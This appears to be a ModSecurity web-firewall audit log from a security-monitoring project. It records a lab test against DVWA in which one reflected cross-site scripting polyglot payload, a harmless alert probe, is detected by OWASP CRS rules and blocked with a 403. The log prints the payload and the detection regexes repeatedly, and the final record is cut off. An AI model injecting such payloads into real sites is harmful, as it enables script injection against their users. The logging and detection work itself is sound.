forked from charlesleavitt/EyesOfArgus
modsec_audit.log
209 lines (209 loc) · 773 KB
{"transaction":{"time":"13/May/2017:08:39:31 --0400","transaction_id":"WRb@g38AAQEAAAkVV38AAAAA","remote_address":"192.168.75.130","remote_port":46150,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/xss_r/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/index.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1419","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRb@g38AAQEAAAkVV38AAAAA\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":814,"p2":1881,"p3":83,"p4":541,"p5":71,"sr":35,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:08:39:31 --0400","transaction_id":"WRb@g38AAQEAAAkW4REAAAAB","remote_address":"192.168.75.130","remote_port":46152,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/xss_r/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/index.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1419","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRb@g38AAQEAAAkW4REAAAAB\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":978,"p2":2285,"p3":106,"p4":660,"p5":142,"sr":78,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:08:39:53 --0400","transaction_id":"WRb@mX8AAQEAAAkXs94AAAAC","remote_address":"192.168.75.130","remote_port":46160,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/xss_r/?name=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3B+alert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--+%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_r/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"316","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/xss_r/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected XSS using libinjection. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"56\"] [id \"941100\"] [rev \"2\"] [msg \"XSS Attack Detected via libinjection\"] [data \"Matched Data: connection found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\x22; alert(String.fromCharCode(88,83,83))//\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Warning. Pattern match \"(?i)([<\\xef\\xbc\\x9c]script[^>\\xef\\xbc\\x9e]*[>\\xef\\xbc\\x9e][\\\\s\\\\S]*?)\" at ARGS:name. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"91\"] [id \"941110\"] [rev \"2\"] [msg \"XSS Filter - Category 1: Script Tag Vector\"] [data \"Matched Data: <SCRIPT> found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\x22; alert(String.fromCharCode(88,83,83))//\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"4\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Warning. Pattern match \"(?i)<[^\\\\w<>]*(?:[^<>\\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ...\" at ARGS:name. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"267\"] [id \"941160\"] [rev \"2\"] [msg \"NoScript XSS InjectionChecker: HTML Injection\"] [data \"Matched Data: </SCRIPT found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\x22; alert(String.fromCharCode(88,83,83))//\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 18)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=15,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): NoScript XSS InjectionChecker: HTML Injection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRb@mX8AAQEAAAkXs94AAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. detected XSS using libinjection. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"56\"] [id \"941100\"] [rev \"2\"] [msg \"XSS Attack Detected via libinjection\"] [data \"Matched Data: connection found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\\\\\\\x22; alert(String.fromCharCode(88,83,83))//\\\\\\\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\\\\\\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRb@mX8AAQEAAAkXs94AAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. 
Pattern match \"(?i)([<\\\\\\\\xef\\\\\\\\xbc\\\\\\\\x9c]script[^>\\\\\\\\xef\\\\\\\\xbc\\\\\\\\x9e]*[>\\\\\\\\xef\\\\\\\\xbc\\\\\\\\x9e][\\\\\\\\\\\\\\\\s\\\\\\\\\\\\\\\\S]*?)\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"91\"] [id \"941110\"] [rev \"2\"] [msg \"XSS Filter - Category 1: Script Tag Vector\"] [data \"Matched Data: <SCRIPT> found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\\\\\\\x22; alert(String.fromCharCode(88,83,83))//\\\\\\\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\\\\\\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"4\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRb@mX8AAQEAAAkXs94AAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. 
Pattern match \"(?i)<[^\\\\\\\\\\\\\\\\w<>]*(?:[^<>\\\\\\\\\"'\\\\\\\\\\\\\\\\s]*:)?[^\\\\\\\\\\\\\\\\w<>]*(?:\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?c\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?i\\\\\\\\\\\\\\\\W*?p\\\\\\\\\\\\\\\\W*?t|\\\\\\\\\\\\\\\\W*?f\\\\\\\\\\\\\\\\W*?o\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?m|\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?t\\\\\\\\\\\\\\\\W*?y\\\\\\\\\\\\\\\\W*?l\\\\\\\\\\\\\\\\W*?e|\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?v\\\\\\\\\\\\\\\\W*?g|\\\\\\\\\\\\\\\\W*?m\\\\\\\\\\\\\\\\W*?a\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?q\\\\\\\\\\\\\\\\W*?u\\\\\\\\\\\\\\\\W*?e\\\\\\\\\\\\\\\\W*?e|(?:\\\\\\\\\\\\\\\\W*?l\\\\\\\\\\\\\\\\W*?i\\\\\\\\\\\\\\\\W*?n\\\\\\\\\\\\\\\\W*?k|\\\\\\\\\\\\\\\\W*?o\\\\\\\\\\\\\\\\W*?b\\\\\\\\\\\\\\\\W*?j\\\\\\\\\\\\\\\\W*?e\\\\\\\\ ...\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"267\"] [id \"941160\"] [rev \"2\"] [msg \"NoScript XSS InjectionChecker: HTML Injection\"] [data \"Matched Data: </SCRIPT found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\\\\\\\x22; alert(String.fromCharCode(88,83,83))//\\\\\\\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\\\\\\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/ [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRb@mX8AAQEAAAkXs94AAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 18)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRb@mX8AAQEAAAkXs94AAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=15,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): NoScript XSS InjectionChecker: HTML Injection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRb@mX8AAQEAAAkXs94AAAAC\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":689,"p2":3261,"p3":0,"p4":0,"p5":131,"sr":34,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:08:47:05 --0400","transaction_id":"WRcASX8AAQEAAAkYuD8AAAAD","remote_address":"127.0.0.1","remote_port":41700,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/ HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive","Upgrade-Insecure-Requests":"1","If-Modified-Since":"Wed, 10 May 2017 02:17:21 GMT","If-None-Match":"\"cca-54f22127f468d-gzip\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Wed, 10 May 2017 02:17:21 GMT","ETag":"\"cca-54f22127f468d-gzip\"","Accept-Ranges":"bytes","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1210","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/\"] [unique_id \"WRcASX8AAQEAAAkYuD8AAAAD\"]"],"stopwatch":{"p1":784,"p2":1763,"p3":63,"p4":523,"p5":54,"sr":62,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:08:47:05 --0400","transaction_id":"WRcASX8AAQEAAAkYuEAAAAAD","remote_address":"127.0.0.1","remote_port":41700,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Thu, 11 May 2017 01:54:25 GMT","If-None-Match":"\"107-54f35de4f1afb\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 12:47:03 GMT","ETag":"\"107-54f6738077c82\"","Accept-Ranges":"bytes","Content-Length":"263","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRcASX8AAQEAAAkYuEAAAAAD\"]"],"stopwatch":{"p1":614,"p2":987,"p3":52,"p4":157,"p5":49,"sr":21,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:08:47:05 --0400","transaction_id":"WRcASX8AAQEAAAkYuEEAAAAD","remote_address":"127.0.0.1","remote_port":41700,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 